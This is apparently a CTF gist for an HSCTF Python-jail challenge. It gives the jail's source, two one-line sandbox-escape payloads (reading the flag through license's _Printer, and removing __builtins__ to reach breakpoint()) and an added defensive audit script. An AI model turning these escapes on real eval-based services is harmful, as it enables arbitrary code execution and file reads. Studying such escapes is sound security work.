@maple3142
Created June 11, 2022 05:57
hsctf
type(license)(None,None,(input(),),(input(),))()
then input these:
flag
.
see https://github.com/python/cpython/blob/4c496f1f115a7910d4606b4de233d14874c77bfa/Lib/_sitebuiltins.py#L29-L85
#!/usr/bin/env python3
import string


def main():
    allowed_chars = string.ascii_letters + string.digits + ",!+-/@&|~^<>(){}"
    allowed_globals = vars(__builtins__).copy()
    for var in (
        "getattr", "eval", "exec", "__import__", "open", "__builtins__", "__build_class__",
        "__loader__", "__spec__"
    ):
        allowed_globals[var] = None
    print("Python as a Service:")
    print("Execute arbitrary Python code (with certain restrictions)")
    while True:
        try:
            s = input("> ")
        except (EOFError, KeyboardInterrupt):
            exit()
        if not s:
            continue
        if any(c not in allowed_chars for c in s):
            print("Illegal characters")
            continue
        try:
            print(eval(s, allowed_globals))
        except Exception as e:
            print(e)


if __name__ == "__main__":
    main()
setattr(copyright,'__dict__',globals()),delattr(copyright,'__builtins__')
replace string with input(), then
breakpoint()
I think this works because it first removes `__builtins__` from the global dict, so it is the same as not blocking any builtins on the next exec call
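The sketch below is an added example, not part of the original gist or the challenge: it rebuilds the jail's namespace, lists the names the blocklist leaves reachable, and checks the `eval()` behaviour the note above relies on. The `REVIEW` set and the allowlist contents are assumptions chosen for illustration.

```python
import builtins
import _sitebuiltins

# Blocklist copied from the challenge source above.
BLOCKED = ("getattr", "eval", "exec", "__import__", "open", "__builtins__",
           "__build_class__", "__loader__", "__spec__")
# Assumed review list: builtins that mutate objects or hand control to the user.
REVIEW = {"setattr", "delattr", "breakpoint", "input", "type", "globals", "vars"}


def jail_globals():
    """Rebuild the jail namespace the way the challenge does."""
    g = vars(builtins).copy()  # the script uses vars(__builtins__); same mapping
    for name in BLOCKED:
        g[name] = None
    return g


def audit(namespace):
    """Return the sorted names a blocklist review should flag."""
    flagged = set()
    for name, value in namespace.items():
        if value is None:
            continue
        # site.py adds license/copyright/credits as _Printer objects; that
        # class can load text from files on disk (see the _sitebuiltins.py link).
        if isinstance(value, _sitebuiltins._Printer) or name in REVIEW:
            flagged.add(name)
    return sorted(flagged)


def eval_restores_builtins():
    """eval() inserts the real builtins when the key is absent from globals."""
    g = {"eval": None}  # constructed namespace without a "__builtins__" key
    eval("0", g)
    return g.get("__builtins__") is not None


def allowlist_globals():
    """Allowlist alternative: start empty and add only what is needed."""
    return {"__builtins__": {}, "abs": abs, "len": len, "min": min, "max": max}


if __name__ == "__main__":
    print("flagged in blocklist jail:", audit(jail_globals()))
    print("flagged in allowlist jail:", audit(allowlist_globals()))
    print("eval restores __builtins__:", eval_restores_builtins())
```

An empty audit result only means none of the listed names are exposed; in-process `eval()` filtering is still not an isolation boundary, so untrusted code belongs in a separate sandboxed process.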